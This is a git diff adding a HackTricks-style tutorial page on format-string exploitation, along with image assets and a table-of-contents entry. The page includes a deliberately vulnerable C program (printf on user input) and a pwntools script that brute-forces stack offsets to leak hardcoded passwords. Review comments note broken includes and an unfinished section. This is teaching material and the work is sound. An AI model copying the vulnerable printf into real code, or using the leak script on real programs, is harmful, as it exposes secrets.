diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png
new file mode 100644
index 000000000..b0a1f83a4
Binary files /dev/null and b/.gitbook/assets/image (1225).png differ
diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png
new file mode 100644
index 000000000..66c23406f
Binary files /dev/null and b/.gitbook/assets/image (1226).png differ
diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png
new file mode 100644
index 000000000..47298f9e6
Binary files /dev/null and b/.gitbook/assets/image (1227).png differ
diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png
new file mode 100644
index 000000000..2cb50f892
Binary files /dev/null and b/.gitbook/assets/image (1228).png differ
diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png
new file mode 100644
index 000000000..ffbd0b31e
Binary files /dev/null and b/.gitbook/assets/image (1229).png differ
diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png
new file mode 100644
index 000000000..49c6c459e
Binary files /dev/null and b/.gitbook/assets/image (1230).png differ
diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png
new file mode 100644
index 000000000..545fcdfaf
Binary files /dev/null and b/.gitbook/assets/image (1231).png differ
diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png
new file mode 100644
index 000000000..a3ec7d605
Binary files /dev/null and b/.gitbook/assets/image (1232).png differ
diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png
new file mode 100644
index 000000000..4d9c81fde
Binary files /dev/null and b/.gitbook/assets/image (1233).png differ
diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png
new file mode 100644
index 000000000..21b3b1ba6
Binary files /dev/null and b/.gitbook/assets/image (1234).png differ
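Review bot: ten PNG assets, `image (1225).png` through `image (1234).png`, are added in this commit, but the only page it creates mentions two screenshots, and no image link is visible in that page at either mention. Please confirm which of these files the new page actually embeds and move any that belong to other pages into the commits that use them.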
diff --git a/SUMMARY.md b/SUMMARY.md
index 7edb398d4..1cc896174 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -715,6 +715,7 @@
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)
+ * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
* [Heap](binary-exploitation/heap/README.md)
* [Use After Free](binary-exploitation/heap/use-after-free.md)
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
new file mode 100644
index 000000000..68ef4728b
--- /dev/null
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -0,0 +1,106 @@
+# Format Strings - Arbitrary Read Example
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Code
+
+```c
+#include
+#include
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+ char stack_password[20] = "secretStackPass"; // Password in stack
+ char input1[20], input2[20];
+
+ printf("Enter first password: ");
+ scanf("%19s", input1);
+
+ printf("Enter second password: ");
+ scanf("%19s", input2);
+
+ // Vulnerable printf
+ printf(input1);
+ printf("\n");
+
+ // Check both passwords
+ if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+ printf("Access Granted.\n");
+ } else {
+ printf("Access Denied.\n");
+ }
+
+ return 0;
+}
+```
+
+Compile it with:
+
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+
+### Read from stack
+
+The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:
+
+```python
+from pwn import *
+
+for i in range(100):
+ print(f"Try: {i}")
+ payload = f"%{i}$s\na".encode()
+ p = process("./fs-read")
+ p.sendline(payload)
+ output = p.clean()
+ print(output)
+ p.close()
+```
+
+In the image it's possible to see that we can leak the password from the stack in the `10th` position:
+
+
+
+
+
+Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
+
+
+
+
+
+
+
+The difference between the leaked address and the address of the password is:
+
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
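Review bot: in the C listing under "## Code", both `#include` directives are empty, so the program will not build with the clang command given below it; the code calls printf, scanf and strcmp, so they should read `#include <stdio.h>` and `#include <string.h>`. The comment "Password in BSS" is also inaccurate: `bss_password` has an initializer, so it is placed in .data rather than .bss. In "Read from stack", "form the stack" should be "from the stack", and the two sentences that refer to an image are followed only by blank lines. The page stops after computing the `0x126a` offset without saying how that offset is used or how `bss_password` is read, so the "Arbitrary Read" title is not yet backed by the content; either add that section or retitle the page. Since the build line needs `-Wno-format-security` to silence the compiler warning, it would also help readers to state the corrected call next to the vulnerable one, i.e. `printf("%s", input1);`.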